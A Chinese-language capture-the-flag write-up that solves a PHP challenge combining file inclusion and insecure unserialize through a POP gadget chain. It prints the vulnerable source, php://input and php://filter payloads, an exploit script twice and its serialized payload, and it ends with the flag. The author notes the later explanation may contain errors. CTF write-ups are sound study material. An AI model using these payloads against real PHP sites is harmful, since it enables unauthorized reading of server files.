bmzctf刷题 simple_pop
这是一道好题,正好我qwb的拿到pop-master没做出来,正好练习练习,写的详细一点
考点:反序列化
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,‘r‘)==="welcome to the beijing")){
echo "<br><h1>".file_get_contents($text,‘r‘)."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
代码先传入三个参数,text
,file
,password
然后判断是否存在text
同时text
内容是否为welcome to the beijing
,两个条件同时满足进入下一项
file请求内容是否包含/flag
没有则包含file
file_get_contents
直接用get请求text失败
页面毫无反应
查看一下手册对file_get_contents
的说明
据我的分析,这个file_get_contents
应该是从一个位置读取数据,也就是说我们传入的text应
该是一个url或者是一个文件之类的,才可以保证
file_get_contents($text,‘r‘)==="welcome to the beijing"
所以我在我的一个服务器的index.php写welcome to beijing
??
不明觉厉
访问请求的原始数据。。。。我难道其他方法传入的数据不够原始么
读取useless.php
文件时没有发现什么信息
改用伪协议读取useless.php
源码
payload:?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php
base64解码的得到源码
<?php
class Modifier {
protected $var;
public function append($value){
include($value);//flag.php
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file=‘index.php‘){
$this->source = $file;
echo ‘Welcome to ‘.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET[‘password‘])){
@unserialize($_GET[‘password‘]);
}
else{
$a=new Show;
}
?>
利用链:Show::__wakeup()->Show::__toString()->Test::__get()->Modifier::__invoke()->Modifier::append($value)
exp:
<?php
class Modifier {
protected $var=‘php://filter/read=convert.base64-encode/resource=/flag‘ ;
}
class Show{
public $source;
public $str;
public function __construct(){
$this->str = new Test();
$this->str->p = new Modifier();
}
}
class Test{
public $p;
}
$objshow = new Show();
$objshow->source = new Show();
echo urlencode(serialize($objshow));
?>
这个反序列化的思路是这样的
首先这段代码中的关键点是Modifier类
中的include
,让include
去执行php://filter/read=convert.base64-encode/resource=/flag
如果想要Modifier类
中的include
被执行,只可以通过触发Modifier
中的append
而要让append执行,需要调用Modifier类
的__invoke()
但是__invoke()
的调用需要条件
__invoke() 当尝试将对象调用为函数时触发
利用链:
Modifier::__invoke() --> Modifier::append($value)
那么该选用什么当作__invoke()
的对象呢?
这里面唯一可以在执行后返回一个对象的就是Test类
的__get($key)
,Test类
的__get($key)
触发后会return一个$function()
,正好可以当作Modifier类
的__invoke()
触发条件
但是要是想return出$function
需要调用Test类
的__get
__get:在调用私有属性的时候会自动执行
利用链:Test::__get() --> Modifier::__invoke() --> Modifier::append($value)
__get
的调用条件也可以解释为__get用于从不可访问的属性读取数据或者不存在这个键都会调用
而Test类
有而其他类
没有的私有属性,这个条件正好符合Show类
中的__toString()
属性和__wakeup()
属性,而其中的__toString()
属性正好可以控制source
利用链:
Show::__toString() --> Test::__get() --> Modifier::__invoke() --> Modifier::append($value)
__toString:当对象(类)被当做一个字符串使用时调用。
因此我们要让source
为Show
的对象
利用链:
Show::__wakeup() --> Show::__toString() --> Test::__get() --> Modifier::__invoke() --> Modifier::append($value)
exp:
<?php
class Modifier {
protected $var=‘php://filter/read=convert.base64-encode/resource=/flag‘ ;
}
class Show{
public $source;
public $str;
public function __construct(){
$this->str = new Test();
$this->str->p = new Modifier();
}
}
class Test{
public $p;
}
$objshow = new Show();
$objshow->source = new Show();
echo urlencode(serialize($objshow));
?>
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A54%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A54%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D
base64解密:
BMZCTF{552a0aa0bae14d98a8ecffa61f5bfeab}
PS:好吧,我承认最后我有点乱了,可能后面有错误的内容,等我清醒地时候再校对一边吧,毕竟现在已经3:11了。。。。
参考:
https://blog.csdn.net/cjdgg/article/details/117308150
https://blog.csdn.net/qq_26243045/article/details/110264439
https://mochu.blog.csdn.net/article/details/115800481
php反序列化理解:
https://www.cnblogs.com/tr1ple/p/11156279.html